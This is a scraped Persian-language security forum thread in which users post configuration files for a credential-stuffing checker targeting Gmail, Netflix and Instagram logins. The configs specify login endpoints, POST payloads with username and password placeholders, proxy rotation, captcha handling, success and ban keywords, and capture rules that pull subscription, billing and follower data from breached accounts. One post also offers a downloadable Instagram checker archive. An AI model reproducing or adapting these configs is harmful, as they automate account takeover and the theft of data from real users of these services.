EnableGlobalSourceRetry=1
EnableSourceSuccess=1
EnableSourceBan=0
EnableSourceFail=1
EnableSourceRetry=0
SourceSuccess=<b id="dtl">Inbox</b>
SourceBan=
SourceFail=The username or password you entered is incorrect.
SourceRetry=
[Fake]
blnSuccess=0
SuccessRetries=3
blnCompleteNot=1
AfterFP=1
Success=2
blnInvalidPath=0
EnableConHits=0
ConHits=0
KeysOnIA=0
FollowRedirect=0
EnableConLength=0
ConLength=-1
SourceTags=1
HTTPFollow=1
blnForbToOK=0
ForbToOkLength=1000
blnBadOcrCode=0
BadOcrCodeRetries=3
blnBanKeys=0
[Form]
Username=Email
Password=Passwd
AddData=continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fx%2Fut5atua72fwv%2F&service=mail&nui=5&dsh=758578038212077920&ltmpl=ecobh&btmpl=mobile&scc=1&timeStmp=&secTok=&GALX=C8jOr5_eIs8&PersistentCookie=yes&rmShown=1&signIn=Sign+in
Action=https://accounts.google.com/ServiceLoginAuth
Cookie=GALX=C8jOr5_eIs8; GAPS=1:tJ8iZdbTGis1vssSlWSJ5mVg3WCxpQ:CyqBoccRHUxWcwtZ
ReqReferer=
ReqCookie=
AjaxURL=
AjaxPOSTData=
AjaxData=
AjaxParsingCode=
RefData=
ParsingCode=
FormRedirectUrl=
FormRedirectCondition=
DataDesc=
CaptureParsingCode=
RefreshSession=0
RefreshCookie=1
FormHeader=0
AjaxHeader=0
GetAnswer=0
GetAnswerAjax=0
Recursive=0
ImageAfterAjax=0
blnBasic=0
[OCR]
OCRMode=0
URLMode=0
ImageURLID=
Captcha=
FixedImageURL=
OCRKey=
RefreshCaptcha=0
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnCharTable=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnThreeImages=0
blnGif=0
blnCompute=0
blnBorderPre=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng
[Ajax]
Variables=
PostElements=
RedURL=

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.


Iran Cyber Security Group

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

NetFlix

Hit high

نیاز به پروک*سی


[settings]
SiteURL=https://Stefy.netflix.com/EstefanyCastillo#8273
Timeout=20
WaitBot=0
ResolveHost=0
ComboFilter=0
UsernameStart=6
UsernameEnd=8
PasswordStart=6
PasswordEnd=8
ComboMode=0
Letters=0
Digits=0
Alpha=0
Email=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordEmail=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
EmailFilter=0
EmailMode=0
ProxyActivate=10
ProxyRatio=0
ProxyCombo=0
WaitTime=1
BanWindowWidth=1
BanWindowProxies=10
BanWindowRatio=10
blnNoProxies=0
RequestMethod=2
Referer=0
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|User-Agent: Argo/9.0.2 (iPhone; iOS 11.3; Scale/2.00)|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
POSTData=appInternalVersion=9.0.0&appVersion=9.0.0&callPath=["moneyball","appleSignUp","next"]&device_type=NFAPPL-02-&idiom=phone&iosVersion=11.3&isTablet=false&kids=false&maxDeviceWidth=320&method=call&model=saget&modelType=IPHONE8-4&odpAware=true&param={"action":"loginAction","fields":{"email":"<USER>","rememberMe":"true","password":"<PASS>"},"verb":"POST","mode":"login","flow":"appleSignUp"}&pathFormat=graph&pixelDensity=2.0&progressive=false&responseFormat=json

[Keywords]
HeaderFail=
HeaderSuccess=
HeaderBan=<FIELD:HTTP>||403
HeaderRetry=<MATCH>||Stefy&&<MATCH>||EstefanyCastillo#8273;4&&<MATCH>||EstefanyCastillo#8273
SourceFail="mode":"login",&&<NOT>||throttling_failure;<SCombo>||"mode":"welcome",
SourceSuccess="mode":"memberHome",;CURRENT_MEMBER
SourceBan="mode":"login",&&throttling_failure;Invalid Request
SourceRetry=postDyscom
EnableHeaderFail=0
EnableHeaderSuccess=0
EnableHeaderBan=1
EnableHeaderRetry=1
EnableSourceFail=1
EnableSourceSuccess=1
EnableSourceBan=1
EnableSourceRetry=1
EnableGlobalSourceRetry=1

[Fake]
AfterFP=1
FollowRedirect=1
EnableConHits=0
Success=3
ConHits=0
EnableConLength=0
SourceTags=1
ConLength=-1
blnSuccess=0
SuccessRetries=3
blnForbToOK=1
ForbToOkLength=1000
blnBadOcrCode=0
BadOcrCodeRetries=3
blnCompleteNot=1
HTTPFollow=1
blnProcessErrors=1
blnInvalidPath=1
UserField=0

[Form]
IAParse=0
blnBasic=0
Action=https://api-global.netflix.com/iosui/user/9.0
Username=
Password=
Email=
CustomData=appInternalVersion=9.0.0&appVersion=9.0.0&callPath=["moneyball","appleSignUp","next"]&device_type=NFAPPL-02-&idiom=phone&iosVersion=11.3&isTablet=false&kids=false&maxDeviceWidth=320&method=call&model=saget&modelType=IPHONE8-4&odpAware=true&param={"action":"loginAction","fields":{"email":"<USER>","rememberMe":"true","password":"<PASS>"},"verb":"POST","mode":"login","flow":"appleSignUp"}&pathFormat=graph&pixelDensity=2.0&progressive=false&responseFormat=json
NoIndex=
AddData=
Cookie=
IAction=-1
IUser=-1
IPass=-1
IEmail=-2
ICaptcha=-1
ReqReferer=
ReqCookie=
AjaxURL=
AjaxPOSTData=
AjaxData=
AjaxParsingCode=
RefData=
ParsingCode=
FormRedirectUrl=https://www.netflix.com/youraccount?nftoken=
RedPostData=
LoginPostData=
RedKeys=<Source>||CURRENT_MEMBER;<Source>||"mode":"memberHome",
DataDesc=Subscription&Country&DVD&Trial&Screens&HD&Ultra HD&Next billing
CaptureParsingCode="membershipStatus":"CURRENT_MEMBER|"|#00|RedURL|0|#00|Premium/EstefanyCastillo#8273/|0&"countrycode":"|"|#00|RedURL|0|#00|#00|0&"isDVD"
برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.
,|#00|RedURL|0|#00|#00|0&"isInFreeTrial"
برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.
,|#00|RedURL|0|#00|#00|0&"maxStreams"
برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.
,|#00|RedURL|0|#00|#00|0&"hasHD"
برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.
,|#00|RedURL|0|#00|#00|0&"hasUHD"
برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.
,|#00|RedURL|0|#00|#00|0&"nextBillingDate":"|"|#00|RedURL|0|#00|#00|0
RefreshSession=0
RefreshCookie=0
IAMethod=2
POSTMethod=2
RedMethod=1
LoginMethod=1
AjaxHeader=0
FormHeader=0
RedHeader=0
LoginHeader=0
ImageAfterAjax=0
FollowRedirectsOnIA=0
FollowRedirectsOnRed=1

[Ajax]
Variables=RedHeader||Login Page||None||Costant||Accept: text/html,application/xhtml+xml,application/xml#3Bq=0.9,*/*#3Bq=0.8\nUser-Agent: Mozilla/5.0 (iPhone#3B CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1\nAccept-Language: fr-fr||None||None||Username||||-1||-1||0||0||0||0&&nfvid||Post Action||None||HParsingCode||nfvdid=|#3B|#00|#00|0|#00|#00|0||None||None||Username||||-1||-1||0||0||0||0&&DNT||Post Action||None||Costant||DNT: 1#3B ||None||None||Username||||-1||-1||0||0||0||0&&SecureNetflixID||Post Action||None||Costant||SecureNetflixId=||&||None||HParsingCode||SecureNetflixID=|#3B|#00|#00|0|#00|#00|0||-1||-1||0||0||0||0&&1||Post Action||None||DNT||||&||None||SecureNetflixID||||2||3||0||0||0||0
PostElements2=None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&nfvid&&None&&1&&RedHeader
RedURL=

[OCR]
OCRMode=0
URLMode=0
ImageURLID=||
Captcha=
OCRKey=
RefreshCaptcha=0
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnGif=0
blnCompute=0
blnBorderPre=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng


برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.


Iran Cyber Security Group

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

instagram

کپچر

نیاز به پروک*سی

کمبو: یوزر و پسورد[Wordlist]
UserIndex=1
PassIndex=2
EmailIndex=0
194A9BBA44A0DD26863DCF4F4D00F8B7=0

[settings]
SiteURL=https://www.instagram.com/
Timeout=20
WaitBot=0
ResolveHost=0
ComboFilter=0
UsernameStart=6
UsernameEnd=8
PasswordStart=6
PasswordEnd=8
ComboMode=0
Letters=0
Digits=0
Alpha=0
Email=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordEmail=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
EmailFilter=0
EmailMode=0
ProxyActivate=10
ProxyRatio=4
ProxyCombo=0
WaitTime=1
BanWindowWidth=1
BanWindowProxies=10
BanWindowRatio=10
blnNoProxies=0
RequestMethod=2
Referer=2
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: https://www.instagram.com/|User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
POSTData=username=<user>&password=<pass>

[Form]
IAParse=0
blnBasic=0
Action=https://www.instagram.com/accounts/login/ajax/
Username=
Password=
Email=
CustomData=
NoIndex=
AddData=username=<user>&password=<pass>
Cookie=mid=V6bzvQAEAAFSzah_m-Ky1RnV5Y99; Max-Age=630720000; csrftoken=v57l7Q4Cs4QtekPy4CU1LETSD4YQ6jMt
IAction=-1
IUser=-1
IPass=-1
IEmail=-2
ICaptcha=-1
ReqReferer=
ReqCookie=
AjaxURL=
AjaxPOSTData=
AjaxData=
AjaxParsingCode=
RefData=
ParsingCode=
FormRedirectUrl=https://www.instagram.com/<user>/?__a=1
RedPostData=
LoginPostData=
RedKeys=<Source>||authenticated": true
DataDesc=Followers&Following
CaptureParsingCode=y": {"count"
برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.
}|#00|#00|0|#00|#00|0&nt"
برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.
}|#00|#00|0|#00|#00|0
RefreshSession=0
RefreshCookie=1
IAMethod=2
POSTMethod=2
RedMethod=1
LoginMethod=1
AjaxHeader=0
FormHeader=1
RedHeader=1
LoginHeader=0
ImageAfterAjax=0
FollowRedirectsOnIA=0
FollowRedirectsOnRed=1

[Ajax]
Variables=1||Login Page||None||Costant||X-CSRFToken: ||&||None||Cookie||csrftoken=||-1||-1||0||0||0||0&&2||Login Page||None||1||||&||None||Costant||\nX-Instagram-AJAX: 1||0||-1||0||0||0||0
PostElements2=None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&2&&None&&None&&None&&None
RedURL=

[OCR]
OCRMode=0
URLMode=0
ImageURLID=||
Captcha=
OCRKey=
RefreshCaptcha=0
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnGif=0
blnCompute=0
blnBorderPre=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng

[Fake]
AfterFP=1
FollowRedirect=1
EnableConHits=0
Success=3
ConHits=0
EnableConLength=0
SourceTags=1
ConLength=-1
blnSuccess=0
SuccessRetries=3
blnForbToOK=1
ForbToOkLength=1000
blnBadOcrCode=0
BadOcrCodeRetries=3
blnCompleteNot=1
HTTPFollow=1
blnProcessErrors=1
blnInvalidPath=1
UserField=0

[Keywords]
HeaderFail=
HeaderSuccess=
HeaderBan=
HeaderRetry=
SourceFail=authenticated": false;<SCombo>||message": "checkpoint_required"
SourceSuccess="user": {"username":
SourceBan=
SourceRetry=
EnableHeaderFail=0
EnableHeaderSuccess=0
EnableHeaderBan=0
EnableHeaderRetry=0
EnableSourceFail=1
EnableSourceSuccess=1
EnableSourceBan=0
EnableSourceRetry=0
EnableGlobalSourceRetry=1
برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.


Iran Cyber Security Group

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Intagram ProxyLess -Capture FAST

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

intagram.zip


Iran Cyber Security Group

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.


تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...